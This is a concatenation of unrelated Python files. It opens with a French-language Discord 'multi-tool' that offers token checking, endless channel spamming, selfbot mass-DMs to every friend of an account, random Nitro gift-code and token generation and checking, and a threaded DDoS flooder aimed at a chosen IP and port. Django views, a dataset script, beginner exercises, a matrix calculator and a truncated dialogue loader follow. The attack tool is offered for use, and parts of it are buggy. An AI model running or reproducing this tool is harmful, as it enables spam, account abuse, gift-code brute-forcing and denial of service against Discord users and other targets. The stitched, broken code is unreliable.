headers = {'Content-Type': 'application/json', 'authorization': token}
url = "https://discordapp.com/api/v6/users/@me/library"
r = requests.get(url, headers=headers)
if r.status_code == 200:
print("{} | Token Valid".format(line.strip("\n")))
else:
print("Token Invalid | {}".format(line.strip("\n")))
def TOKEN_DM():
clear()
os.system("title STRANGER/TOKEN DM")
print(Fore.GREEN +"""
████████╗░█████╗░██╗░░██╗███████╗███╗░░██╗ ██████╗░███╗░░░███╗
╚══██╔══╝██╔══██╗██║░██╔╝██╔════╝████╗░██║ ██╔══██╗████╗░████║
░░░██║░░░██║░░██║█████═╝░█████╗░░██╔██╗██║ ██║░░██║██╔████╔██║
░░░██║░░░██║░░██║██╔═██╗░██╔══╝░░██║╚████║ ██║░░██║██║╚██╔╝██║
░░░██║░░░╚█████╔╝██║░╚██╗███████╗██║░╚███║ ██████╔╝██║░╚═╝░██║
░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚══╝ ╚═════╝░╚═╝░░░░░╚═╝
"""+ Fore.RESET)
print("")
token = input("[+]token :")
clear()
print(Fore.GREEN +"""
████████╗░█████╗░██╗░░██╗███████╗███╗░░██╗ ██████╗░███╗░░░███╗
╚══██╔══╝██╔══██╗██║░██╔╝██╔════╝████╗░██║ ██╔══██╗████╗░████║
░░░██║░░░██║░░██║█████═╝░█████╗░░██╔██╗██║ ██║░░██║██╔████╔██║
░░░██║░░░██║░░██║██╔═██╗░██╔══╝░░██║╚████║ ██║░░██║██║╚██╔╝██║
░░░██║░░░╚█████╔╝██║░╚██╗███████╗██║░╚███║ ██████╔╝██║░╚═╝░██║
░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚══╝ ╚═════╝░╚═╝░░░░░╚═╝
"""+ Fore.RESET)
id = input("[+]id :")
clear()
print(Fore.GREEN +"""
████████╗░█████╗░██╗░░██╗███████╗███╗░░██╗ ██████╗░███╗░░░███╗
╚══██╔══╝██╔══██╗██║░██╔╝██╔════╝████╗░██║ ██╔══██╗████╗░████║
░░░██║░░░██║░░██║█████═╝░█████╗░░██╔██╗██║ ██║░░██║██╔████╔██║
░░░██║░░░██║░░██║██╔═██╗░██╔══╝░░██║╚████║ ██║░░██║██║╚██╔╝██║
░░░██║░░░╚█████╔╝██║░╚██╗███████╗██║░╚███║ ██████╔╝██║░╚═╝░██║
░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚══╝ ╚═════╝░╚═╝░░░░░╚═╝
"""+ Fore.RESET)
message = input("[+]message :")
clear()
print(Fore.GREEN +"""
████████╗░█████╗░██╗░░██╗███████╗███╗░░██╗ ██████╗░███╗░░░███╗
╚══██╔══╝██╔══██╗██║░██╔╝██╔════╝████╗░██║ ██╔══██╗████╗░████║
░░░██║░░░██║░░██║█████═╝░█████╗░░██╔██╗██║ ██║░░██║██╔████╔██║
░░░██║░░░██║░░██║██╔═██╗░██╔══╝░░██║╚████║ ██║░░██║██║╚██╔╝██║
░░░██║░░░╚█████╔╝██║░╚██╗███████╗██║░╚███║ ██████╔╝██║░╚═╝░██║
░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚══╝ ╚═════╝░╚═╝░░░░░╚═╝
"""+ Fore.RESET)
def sendMessage(token, id, message):
url = 'https://discordapp.com/api/v6/channels/{}/messages'.format(id)
data = {"content": message}
header = {"authorization": token}
r = requests.post(url, data=data, headers=header)
h = r.status_code
if h == 200:
print("[+] Message Send")
elif h == 429:
print("[/] chargement")
else:
print("[-] Faild !")
while True:
sendMessage(token, id, message)
def DM_ALL():
clear()
print(Fore.RED+"""
██████╗░███╗░░░███╗ ░█████╗░██╗░░░░░██╗░░░░░
██╔══██╗████╗░████║ ██╔══██╗██║░░░░░██║░░░░░
██║░░██║██╔████╔██║ ███████║██║░░░░░██║░░░░░
██║░░██║██║╚██╔╝██║ ██╔══██║██║░░░░░██║░░░░░
██████╔╝██║░╚═╝░██║ ██║░░██║███████╗███████╗
╚═════╝░╚═╝░░░░░╚═╝ ╚═╝░░╚═╝╚══════╝╚══════╝
"""+Fore.RESET)
toto = input("[+] Token >>")
missage = input("[+] Message >>")
client = discord.Client()
@client.event
async def on_connect(message=missage):
for user in client.user.friends:
try:
await user.send(message)
print(f'envoyé a {user.name}')
except:
print(f'fail : {user.name}')
client.run(toto, bot=False)
def TOKEN_TOOLS():
clear()
print(Fore.GREEN +"""
████████╗░█████╗░██╗░░██╗███████╗███╗░░██╗ ████████╗░█████╗░░█████╗░██╗░░░░░░██████╗
╚══██╔══╝██╔══██╗██║░██╔╝██╔════╝████╗░██║ ╚══██╔══╝██╔══██╗██╔══██╗██║░░░░░██╔════╝
░░░██║░░░██║░░██║█████═╝░█████╗░░██╔██╗██║ ░░░██║░░░██║░░██║██║░░██║██║░░░░░╚█████╗░
░░░██║░░░██║░░██║██╔═██╗░██╔══╝░░██║╚████║ ░░░██║░░░██║░░██║██║░░██║██║░░░░░░╚═══██╗
░░░██║░░░╚█████╔╝██║░╚██╗███████╗██║░╚███║ ░░░██║░░░╚█████╔╝╚█████╔╝███████╗██████╔╝
░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚══╝ ░░░╚═╝░░░░╚════╝░░╚════╝░╚══════╝╚═════╝░
"""+Fore.RESET)
print("")
print(Fore.BLUE +" [1]SPAM CHANNELS"+Fore.RESET)
print(Fore.BLUE+" [2]DMALL"+Fore.RESET)
print("")
print(" L pour retourner en arrière")
print("")
token_choice = input(Fore.BLUE +" [+] choix:"+ Fore.RESET)
if token_choice == '1':
TOKEN_DM()
if token_choice == '2':
DM_ALL()
elif token_choice == 'l' or 'L':
return
def DDOS():
clear()
print(Fore.LIGHTRED_EX+"""
██████╗░██████╗░░█████╗░░██████╗
██╔══██╗██╔══██╗██╔══██╗██╔════╝
██║░░██║██║░░██║██║░░██║╚█████╗░
██║░░██║██║░░██║██║░░██║░╚═══██╗
██████╔╝██████╔╝╚█████╔╝██████╔╝
╚═════╝░╚═════╝░░╚════╝░╚═════╝░
"""+Fore.RESET)
with open("ddos/proxys.txt") as f:
for line in f:
proxys = line.strip("\n")
target = input("[+] IP >")
port = int(input("[+] Port >"))
threadee = input('[+] Thread >')
temps = int(input("[+] Temps >"))
timeout = time.time() + temps
sent = 0
while True:
if time.time() > timeout:
print('temps écouler x)')
ime.sleep(2)
else:
pass
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.sendto(('GET /' + target + 'HTTP/1.1\r\n').encode('ascii'), (target, port))
s.sendto(('Host: '+proxys+'\r\n\r\n').encode('ascii'), (target,port))
s.close()
for i in range(int(threadee)):
thread = threading.Thread(target=attack)
thread.start()
def NITRO_CHECKER():
clear()
print(Fore.MAGENTA+"""
███╗░░██╗██╗████████╗██████╗░░█████╗░ ░█████╗░██╗░░██╗███████╗░█████╗░██╗░░██╗███████╗██████╗░
████╗░██║██║╚══██╔══╝██╔══██╗██╔══██╗ ██╔══██╗██║░░██║██╔════╝██╔══██╗██║░██╔╝██╔════╝██╔══██╗
██╔██╗██║██║░░░██║░░░██████╔╝██║░░██║ ██║░░╚═╝███████║█████╗░░██║░░╚═╝█████═╝░█████╗░░██████╔╝
██║╚████║██║░░░██║░░░██╔══██╗██║░░██║ ██║░░██╗██╔══██║██╔══╝░░██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗
██║░╚███║██║░░░██║░░░██║░░██║╚█████╔╝ ╚█████╔╝██║░░██║███████╗╚█████╔╝██║░╚██╗███████╗██║░░██║
╚═╝░░╚══╝╚═╝░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░ ░╚════╝░╚═╝░░╚═╝╚══════╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝
"""+Fore.RESET)
print("oublie pas de générer des nitros pour ensuite les vérif ;)")
time.sleep(3)
with open("gen/nitro_gen.txt") as f:
number_line=0
for line in f:
nitro = line.strip("\n")
number_line += 1
os.system(f'title {number_line}')
url = "https://discordapp.com/api/v6/entitlements/gift-codes/" + nitro + "?with_application=false&with_subscription_plan=true"
r = requests.get(url)
if r.status_code == 200:
print(Fore.GREEN+" Valid | {} ".format(line.strip("\n"))+Fore.RESET)
with open('check/nitro_valide.txt' + 'w+') as f:
f.write(nitro)
break
else:
pass
print(Fore.RED+" Invalid | {} ".format(line.strip("\n"))+Fore.RED)
print('tout à étais check ')
time.sleep(2.8)
def NITRO_GENERATOR():
clear()
print("""
███╗░░██╗██╗████████╗██████╗░░█████╗░ ░██████╗░███████╗███╗░░██╗
████╗░██║██║╚══██╔══╝██╔══██╗██╔══██╗ ██╔════╝░██╔════╝████╗░██║
██╔██╗██║██║░░░██║░░░██████╔╝██║░░██║ ██║░░██╗░█████╗░░██╔██╗██║
██║╚████║██║░░░██║░░░██╔══██╗██║░░██║ ██║░░╚██╗██╔══╝░░██║╚████║
██║░╚███║██║░░░██║░░░██║░░██║╚█████╔╝ ╚██████╔╝███████╗██║░╚███║
╚═╝░░╚══╝╚═╝░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░ ░╚═════╝░╚══════╝╚═╝░░╚══╝
""")
limite = 24
lettres = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
number = int(input("[+] Entre le nombre de nitro que tu veux générer >>"))
o = open("gen/nitro_gen.txt", "w")
for i in range(number):
o.write('discord.gift/'+''.join(random.choice(lettres) for i in range(limite)) + '\n')
o.close()
print("vérifi ton dossier (les nitros ont étais générer la bas ;))")
time.sleep(3.5)
GENERATEUR_TOOLS()
def GENERATEUR_TOOLS():
clear()
print(Fore.CYAN+"""
_____________ ____________ ___ ______________ ______ __________ ____ __ _____
/ ____/ ____/ | / / ____/ __ \/ |/_ __/ ____/ / / / __ \ /_ __/ __ \/ __ \/ / / ___/
/ / __/ __/ / |/ / __/ / /_/ / /| | / / / __/ / / / / /_/ / / / / / / / / / / / \__ \
/ /_/ / /___/ /| / /___/ _, _/ ___ |/ / / /___/ /_/ / _, _/ / / / /_/ / /_/ / /______/ /
\____/_____/_/ |_/_____/_/ |_/_/ |_/_/ /_____/\____/_/ |_| /_/ \____/\____/_____/____/
"""+Fore.RESET)
print("")
print(Fore.MAGENTA+" [1]NITRO")
print(" [2]TOKEN"+Fore.RESET)
print("")
print(" L pour retourner en arrière")
print("")
GENERATEUR_CHOICE = input(Fore.GREEN+" [+] Choice >>"+Fore.RESET)
if GENERATEUR_CHOICE == '1':
NITRO_GENERATOR()
if GENERATEUR_CHOICE == '2':
TOKEN_GEN()
elif GENERATEUR_CHOICE == 'l' or 'L':
return
def GEOIP():
clear()
print("""
░██████╗░███████╗░█████╗░██╗██████╗░
██╔════╝░██╔════╝██╔══██╗██║██╔══██╗
██║░░██╗░█████╗░░██║░░██║██║██████╔╝
██║░░╚██╗██╔══╝░░██║░░██║██║██╔═══╝░
╚██████╔╝███████╗╚█████╔╝██║██║░░░░░
░╚═════╝░╚══════╝░╚════╝░╚═╝╚═╝░░░░░
""")
input('soon soon soon soon soon soon')
def PINGER():
clear()
print("""
██████╗░██╗███╗░░██╗░██████╗░███████╗██████╗░
██╔══██╗██║████╗░██║██╔════╝░██╔════╝██╔══██╗
██████╔╝██║██╔██╗██║██║░░██╗░█████╗░░██████╔╝
██╔═══╝░██║██║╚████║██║░░╚██╗██╔══╝░░██╔══██╗
██║░░░░░██║██║░╚███║╚██████╔╝███████╗██║░░██║
╚═╝░░░░░╚═╝╚═╝░░╚══╝░╚═════╝░╚══════╝╚═╝░░╚═╝
""")
print('soon soon soon soon soon soon soon soon soon soon soon soon soon soon soon soon')
time.sleep(3)
def PROXY_CHECKER():
print("""
██████╗░██████╗░░█████╗░██╗░░██╗██╗░░░██╗ ░█████╗░██╗░░██╗███████╗░█████╗░██╗░░██╗███████╗██████╗░
██╔══██╗██╔══██╗██╔══██╗╚██╗██╔╝╚██╗░██╔╝ ██╔══██╗██║░░██║██╔════╝██╔══██╗██║░██╔╝██╔════╝██╔══██╗
██████╔╝██████╔╝██║░░██║░╚███╔╝░░╚████╔╝░ ██║░░╚═╝███████║█████╗░░██║░░╚═╝█████═╝░█████╗░░██████╔╝
██╔═══╝░██╔══██╗██║░░██║░██╔██╗░░░╚██╔╝░░ ██║░░██╗██╔══██║██╔══╝░░██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗
██║░░░░░██║░░██║╚█████╔╝██╔╝╚██╗░░░██║░░░ ╚█████╔╝██║░░██║███████╗╚█████╔╝██║░╚██╗███████╗██║░░██║
╚═╝░░░░░╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░ ░╚════╝░╚═╝░░╚═╝╚══════╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝
""")
print("soon soon soon soon soon soon soon soon soon soon soon soon soon soon soonsoon ")
time.sleep(3)
def TOKEN_GEN():
clear()
print(Fore.MAGENTA+'''
████████╗░█████╗░██╗░░██╗███████╗███╗░░██╗ ░██████╗░███████╗███╗░░██╗
╚══██╔══╝██╔══██╗██║░██╔╝██╔════╝████╗░██║ ██╔════╝░██╔════╝████╗░██║
░░░██║░░░██║░░██║█████═╝░█████╗░░██╔██╗██║ ██║░░██╗░█████╗░░██╔██╗██║
░░░██║░░░██║░░██║██╔═██╗░██╔══╝░░██║╚████║ ██║░░╚██╗██╔══╝░░██║╚████║
░░░██║░░░╚█████╔╝██║░╚██╗███████╗██║░╚███║ ╚██████╔╝███████╗██║░╚███║
░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚══╝ ░╚═════╝░╚══════╝╚═╝░░╚══╝
'''+Fore.RESET)
chars = ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnop')
number = int(input('[+] Nombre de token >>'))
for i in range(100):
prems = ''.join((random.choice(chars) for i in range(24)))
deux = ''.join((random.choice(chars) for i in range(6)))
trois = ''.join((random.choice(chars) for i in range(27)))
result = prems + '.'+ deux + '.' + trois
l = open('gen/token_gen.txt', 'a')
l.write(result + '\n')
print("vérif ton fichier gen ;)")
time.sleep(3)
def CHECKER():
clear()
print(Fore.BLUE+"""
░█████╗░██╗░░██╗███████╗░█████╗░██╗░░██╗███████╗██████╗░ ████████╗░█████╗░░█████╗░██╗░░░░░░██████╗
██╔══██╗██║░░██║██╔════╝██╔══██╗██║░██╔╝██╔════╝██╔══██╗ ╚══██╔══╝██╔══██╗██╔══██╗██║░░░░░██╔════╝
██║░░╚═╝███████║█████╗░░██║░░╚═╝█████═╝░█████╗░░██████╔╝ ░░░██║░░░██║░░██║██║░░██║██║░░░░░╚█████╗░
██║░░██╗██╔══██║██╔══╝░░██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗ ░░░██║░░░██║░░██║██║░░██║██║░░░░░░╚═══██╗
╚█████╔╝██║░░██║███████╗╚█████╔╝██║░╚██╗███████╗██║░░██║ ░░░██║░░░╚█████╔╝╚█████╔╝███████╗██████╔╝
░╚════╝░╚═╝░░╚═╝╚══════╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝ ░░░╚═╝░░░░╚════╝░░╚════╝░╚══════╝╚═════╝░
""")
print("")
print("")
print(Fore.MAGENTA+" [1] Nitro")
print(Fore.MAGENTA+" [2] Token")
print(Fore.MAGENTA+" [3]proxy"+Fore.RESET)
print("")
CHECKER_choice = input(" [+] Choice >>")
if CHECKER_choice == '1':
NITRO_CHECKER()
if CHECKER_choice == '2':
TOKEN_CHECKER()
if CHECKER_choice == '3':
PROXY_CHECKER()
elif CHECKER_choice == 'l' or 'L':
return
def IP_TOOLS():
clear()
print(Fore.BLUE+"""
██╗██████╗ ████████╗ ██████╗ ██████╗ ██╗ ███████╗
██║██╔══██╗ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██╔════╝
██║██████╔╝ ██║ ██║ ██║██║ ██║██║ ███████╗
██║██╔═══╝ ██║ ██║ ██║██║ ██║██║ ╚════██║
██║██║ ██║ ╚██████╔╝╚██████╔╝███████╗███████║
╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝
"""+Fore.RESET)
print("")
print(Fore.MAGENTA+" [1] = GEOIP")
print(Fore.MAGENTA+" [2] = PINGER")
print(Fore.MAGENTA+" [3] = DDOS"+Fore.RESET)
print("")
print(Fore.BLUE+" L pour retourner en arrière"+Fore.RESET)
print("")
IP_choice = input(Fore.MAGENTA+" [>] Choix >>"+Fore.RESET)
if IP_choice == '1':
GEOIP()
if IP_choice == '2':
PINGER()
if IP_choice == '3':
DDOS()
elif IP_choice == 'l' or 'L':
return
def main():
clear()
print(Fore.RED +"""
██████ ▄▄▄█████▓ ██▀███ ▄▄▄ ███▄ █ ▄████ ▓█████ ██▀███ By Azulax
▒██ ▒ ▓ ██▒ ▓▒▓██ ▒ ██▒▒████▄ ██ ▀█ █ ██▒ ▀█▒▓█ ▀ ▓██ ▒ ██▒ By Azulax
░ ▓██▄ ▒ ▓██░ ▒░▓██ ░▄█ ▒▒██ ▀█▄ ▓██ ▀█ ██▒▒██░▄▄▄░▒███ ▓██ ░▄█ ▒ By Azulax
▒ ██▒░ ▓██▓ ░ ▒██▀▀█▄ ░██▄▄▄▄██ ▓██▒ ▐▌██▒░▓█ ██▓▒▓█ ▄ ▒██▀▀█▄ By Azulax
▒██████▒▒ ▒██▒ ░ ░██▓ ▒██▒ ▓█ ▓██▒▒██░ ▓██░░▒▓███▀▒░▒████▒░██▓ ▒██▒ By Azulax
▒ ▒▓▒ ▒ ░ ▒ ░░ ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░ ▒░ ▒ ▒ ░▒ ▒ ░░ ▒░ ░░ ▒▓ ░▒▓░ By Azulax
░ ░▒ ░ ░ ░ ░▒ ░ ▒░ ▒ ▒▒ ░░ ░░ ░ ▒░ ░ ░ ░ ░ ░ ░▒ ░ ▒░ By Azulax
░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░░ ░ By Azulax
░ ░ ░ ░ ░ ░ ░ ░ ░ By Azulax
"""+ Fore.RESET)
print(Fore.MAGENTA+"""
╔════════════════════════════════════════════════╗
║[1]TOKEN_TOOLS [2]GENERATEUR_TOOLS ║
║[3]IP_TOOLS [4]CHECKER_TOOLS ║
╚════════════════════════════════════════════════╝
"""+Fore.MAGENTA)
print("")
choice = input(Fore.GREEN +"[+] Choix >>"+Fore.RESET)
if choice == '1':
TOKEN_TOOLS()
if choice == '2':
GENERATEUR_TOOLS()
if choice == '3':
IP_TOOLS()
if choice == '4':
CHECKER()
while True:
clear()
main()
|
from django.shortcuts import render,redirect
from .forms import ProfileForm,BusinessForm,PostForm,UpdateForm,ChangeHood
from .models import Profile,Businesses,Neighbour,Feeds
from django.http import HttpResponse,Http404
from django.contrib.auth.decorators import login_required
# Create your views here.
def index(request):
profile=Profile.objects.filter(user_id=request.user.id)
title='Home'
return render(request,'index.html',{'profile':profile,'title':title})
@login_required(login_url='/accounts/login/')
def profile(request):
profile=Profile.objects.filter(user=request.user)
busi=Businesses.objects.filter(user=request.user)
post=Feeds.objects.filter(user=request.user)
if request.method=='POST':
instance=Profile.objects.get(user=request.user)
form=UpdateForm(request.POST or None,request.FILES,instance=instance)
if form.is_valid():
upda=form.save(commit=False)
upda.save()
return redirect('profile')
else:
form=UpdateForm()
if request.method=="POST":
instance=Profile.objects.get(user=request.user)
change=ChangeHood(request.POST or None,request.FILES,instance=instance)
if change.is_valid():
chan=change.save(commit=False)
chan.save()
return redirect('profile')
else:
change=ChangeHood()
title='Profile'
return render(request,'profile.html',{'profile':profile,"busi":busi,'post':post,"form":form,'title':title,'change':change})
@login_required(login_url='/accounts/login/')
def edit(request):
if request.method=='POST':
form=ProfileForm(request.POST,request.FILES)
if form.is_valid():
profile=form.save(commit=False)
profile.user=request.user
profile.save()
return redirect("profile")
else:
form=ProfileForm()
title="Edit"
return render(request,'edit.html',{'form':form,'title':title})
@login_required(login_url='/accounts/login/')
def business(request):
if request.method=='POST':
form=BusinessForm(request.POST)
if form.is_valid():
busi=form.save(commit=False)
busi.user=request.user
form.save()
return redirect('profile')
else:
form=BusinessForm()
return render(request,'business.html',{'form':form})
@login_required(login_url='/accounts/login/')
def feeds(request):
try:
profile=Profile.objects.filter(user=request.user)
arr=[]
for i in profile:
arr.append(i.neigbor.id)
id=arr[0]
business=Businesses.objects.filter(neigbor=id)
feed=Feeds.objects.filter(neigbor=id)
pop_count=Profile.objects.filter(neigbor=id)
all_hoods=Neighbour.objects.filter(id=id)
except Exception as e:
raise Http404()
if request.method=='POST':
form=PostForm(request.POST,request.FILES)
if form.is_valid():
post=form.save(commit=False)
post.user=request.user
post.neigbor=Neighbour(id)
post.save()
return redirect('feeds')
else:
form=PostForm()
title='Feeds'
return render(request,"feeds.html",{"business":business,'form':form,'feed':feed,'hoods':all_hoods,'title':title,'pop':pop_count ,'profile':profile})
@login_required(login_url='/accounts/login/')
def search(request):
if 'businessesName' in request.GET and request.GET['businessesName']:
name=request.GET.get('businessesName')
results=Businesses.search_business(name)
return render(request,'search.html',{'business':results,'name':name})
|
#!/usr/bin/env python3
import os
import subprocess
import tempfile
from pathlib import Path
import pandas as pd
path_to_file = os.path.realpath(__file__)
repo_root = Path(path_to_file).parent.parent
INPUT_ZIP = repo_root / "downloaded-data" / "fine-grained-refactorings.zip"
SAVE_TO = repo_root / "data" / "fine-grained-refactorings.csv"
with tempfile.TemporaryDirectory() as dir:
subprocess.run(["unzip", INPUT_ZIP, "-d", dir])
dfs = [
pd.read_csv(file)
for file in (Path(dir) / "manualy_labeled_commits (goldset)").iterdir()
]
concat_dfs = pd.concat(dfs, axis=0, ignore_index=True)
concat_dfs["owner"] = ""
concat_dfs["repository"] = ""
new_columns = concat_dfs.columns.values.tolist()
new_columns[0] = "sha"
concat_dfs.columns = new_columns
concat_dfs.to_csv(SAVE_TO, index_label="commit_id")
# echo "sha,commit_date,message,refactoring_class,refactoring_type,owner,repository" >> "$OUTPUT_CSV"
|
height = int(input())
num = 1
for i in range(1, height + 1):
for j in range(1, height - i + 2):
if(i == 1 or j == 1 or j == height - i + 1):
print(height-i+1,end=" ")
else:
print(end=" ")
print()
# Sample Input :- 5
# Output :-
# 5 5 5 5 5
# 4 4
# 3 3
# 2 2
# 1
|
print("
___ ___ ___ ________ _________ ________ ___ __
|\ \|\ \|\ \|\ ____\|\___ ___\\ ____\|\ \|\ \
\ \ \ \ \\\ \ \ \___|\|___ \ \_\ \ \___|\ \ \/ /|_
__ \ \ \ \ \\\ \ \_____ \ \ \ \ \ \ \ __\ \ ___ \
|\ \\_\ \ \ \\\ \|____|\ \ \ \ \ \ \ \|\ \ \ \\ \ \
\ \________\ \_______\____\_\ \ \ \__\ \ \_______\ \__\\ \__\
\|________|\|_______|\_________\ \|__| \|_______|\|__| \|__|
\|_________|
")
mat1=[]
mat2=[]
mat3=[]
def creat(r,c,r1,c1):
mat=[]
global mat2,mat1
print("enter elements of 1st matrix:",end=" ")
for i in range(3):#creation of mat1
b=[]
for j in range(3):
insert=0
b.append(insert)
mat1.append(b)
print()
for i in range(r):#creation of mat2
b=[]
for j in range(c):
insert=0
b.append(insert)
mat2.append(b)
for i in range(r):#inserting elements in mat1
b=[]
for j in range(c):
insert=int(input(f"enter {i}{j} elment of mat1 "))
b.append(insert)
mat.append(b)
mat1=mat
print("matrix 1 = ",end=" ")
print()
for i in range(r):#displaying mat1
print("| ",end="")
for j in range(c):
print(mat1[i][j], end=" ")
print("|",end="")
print()
print(end=" ")
print()
mat=[]
print("enter elements of 2st matrix:", end=" ")
print()
for i in range(r1):#inserting elements in mat2
b=[]
for j in range(c1):
insert=int(input(f"enter {i}{j} elment of mat2 "))
b.append(insert)
mat.append(b)
mat2=mat
print("matrix2 = ",end="")
print()
for i in range(r1):#displaying mat2
print("| ",end="")
for j in range(c1):
print(mat2[i][j], end=" ")
print("|",end="")
print()
print(end=" ")
# creat(r,c)
def add(mat1,mat2):#for addition
# m1=[[1,2,3],[1,2,3],[1,2,3]]
# m2=[[1,2,3],[1,2,3],[1,2,3]]
res=[]
for i in range(r):
b=[]
for j in range(c):
insert=0
b.append(insert)
res.append(b)
for i in range(r):
for j in range(c):
res[i][j]=(mat1[i][j]+mat2[i][j])
print("matrix 1 = ")
print()
for i in range(r):#displaying mat1
print("| ",end="")
for j in range(c):
print(mat1[i][j], end=" ")
print("|",end="")
print()
print()
print("matrix2 = ", end="")
print()
for i in range(r1): # displaying mat2
print("| ", end="")
for j in range(c1):
print(mat2[i][j], end=" ")
print("|", end="")
print()
print(end=" ")
print("addition of matrices is =",end=" ")
print()
for i in range(r):
print("| ",end="")
for j in range(c):
print(res[i][j], end=" ")
print("|",end="")
print()
print(end=" ")
def sub(mat1,mat2):#for subtraction
res=[]
print("matrix 1 = ")
print()
for i in range(r): # displaying mat1
print("| ", end="")
for j in range(c):
print(mat1[i][j], end=" ")
print("|", end="")
print()
print()
print("matrix2 = ", end="")
print()
for i in range(r1): # displaying mat2
print("| ", end="")
for j in range(c1):
print(mat2[i][j], end=" ")
print("|", end="")
print()
print()
print("subtraction of matrices is =")
for i in range(r):
b=[]
for j in range(c):
insert=0
b.append(insert)
res.append(b)
for i in range(r):
for j in range(c):
res[i][j]=(mat1[i][j]-mat2[i][j])
for i in range(r):
print("| ",end="")
for j in range(c):
print(res[i][j], end=" ")
print("|",end="")
print()
print(end=" ")
print()
print()
def multi(mat1,mat2):#for multiplication
res = []
for i in range(r):
b = []
for j in range(c1):
insert = 0
b.append(insert)
res.append(b)
for i in range(r):
for j in range(c1):
for k in range(r1):
res[i][j]=res[i][j]+(mat1[i][k]*mat2[k][j])#i for row of mat 1
# k for coloumn of mat1 and row of mat2
# j for column of mat 2
for i in range(r):
print("| ",end="")
for j in range(c1):
print(res[i][j], end=" ")
print("|",end="")
print()
print(end=" ")
def transpose(r2,c2):
global mat3
mat=[]
print("enter elements of 1st matrix:", end=" ")
print()
for i in range(3): # creation of mat1
b = []
for j in range(3):
insert = 0
b.append(insert)
mat3.append(b)
for i in range(r2):#inserting elements in mat
b=[]
for j in range(c2):
insert=int(input(f"enter {i}{j} elment of mat "))
b.append(insert)
mat.append(b)
mat3=mat
res=[]
for i in range(c2):
l=[]
for j in range(r2):
insert=0
l.append(insert)
res.append(l)
print("original matrix:")
for i in range(r2):#displaying mat
print("| ",end="")
for j in range(c2):
print(mat3[i][j], end=" ")
print("|",end="")
print()
for i in range(len(mat3)):
for j in range(len(mat3[0])):
res[j][i]=mat3[i][j]
print()
print("transpose of matrix :")
for i in range(c2):#displaying mat
print("| ",end="")
for j in range(r2):
print(res[i][j], end=" ")
print("|",end="")
print()
run=1
while run:
print("for creating matrices:0")
print("for addition of matrices type 1:")
print("for subtraction of matrices type 2:")
print("for multiplication of matrices type 3:")
print("for transpose of matrix type 4:")
choice=int(input("Enter your choice:"))
if choice==1:
if r==r1 and c==c1:
add(mat1,mat2)
else:
print("number of rows and columns of both matrices are not same")
elif choice==0:
r=int(input("enter number of rows of mat1 : "))
c=int(input("enter number of columns of mat1 : "))
r1=int(input("enter number of rows of mat2: "))
c1=int(input("enter number of columns of mat2: "))
creat(r,c,r1,c1)
elif choice==2:
if r==r1 and c==c1:
sub(mat1,mat2)
else:
print("number of rows and columns of both matrices are not same")
elif choice==3:
if c==r1:
multi(mat1,mat2)
else:
print("number of cols of mat1 is not eqaul to number of rows in mat2")
elif choice==4:
r2 = int(input("enter number of rows of mat : "))
c2 = int(input("enter number of columns of mat : "))
transpose(r2,c2)
else:
break
|
from pathlib import Path
import pandas as pd
import numpy as np
import torch
from decimal import Decimal, ROUND_HALF_UP
import sys
def length_regulator(negos: list, ratio: float):
filtered_dataset = []
# calc # of turns & format the dataset
for nego in negos:
comments = []
raw_comments = []
comment = ""
raw_comment = ""
prev_mover_tag = None
for token in nego[0].split(' '):
if token == "YOU:" or token == "THEM:":
if prev_mover_tag != token and prev_mover_tag is not None:
comments.append(comment)
raw_comments.append(raw_comment)
comment = '<sep>'
raw_comment = token
prev_mover_tag = token
else:
comment = '<sep>'
raw_comment = token
prev_mover_tag = token
else:
if comment == "":
comment = token
raw_comment = token
else:
comment = comment + ' ' + token
raw_comment = raw_comment + ' ' + token
# add an end tag
raw_comments.append('<end>')
comment
# for early detection
turn_count = 0
num_turns = len(comments) * ratio
num_turns = int(Decimal(str(num_turns)).quantize(Decimal('0.1'), rounding=ROUND_HALF_UP))
if num_turns < 1:
num_turns = 1
dialogue = ""
raw_dialogue = ""
for raw_comment, comment in zip(raw_comments, comments):
# for early detection
if turn_count == num_turns:
break
turn_count += 1
if dialogue != "":
dialogue = dialogue + ' ' + comment
if raw_comment != '<end>':
raw_dialogue = raw_dialogue + ' ' + raw_comment
else:
dialogue = comment
if raw_comment != '<end>':
raw_dialogue = raw_comment
dialogue += ' ' + '<end>'
filtered_dataset.append([raw_dialogue, dialogue, nego[1]])
return filtered_dataset
def load_negotiation(path: Path, is_like_dn: bool, ratio: float):
"""Load dataset and make csv files."""
def get_tag(tokens, tag):
return tokens[tokens.index('<'+ tag + '>') + 1: tokens.index('</' + tag + '>')]
def remove_duplication(dataset: list):
"""Remove duplicated logs."""
duplicate_flag = False
nego_b = []
filtered_dataset = []
for index, nego in enumerate(dataset):
if index >= 1:
# check duplicate? index, breakdown flag, duplicate flag
if (nego[0] == nego_b[0] + 1) and nego[2] == nego_b[2] and duplicate_flag is False:
nego_b = nego
duplicate_flag = True
continue
filtered_dataset.append([nego[1], nego[2], nego[3], nego[4], nego[5], nego[-1]])
nego_b = nego
duplicate_flag = False
return filtered_dataset
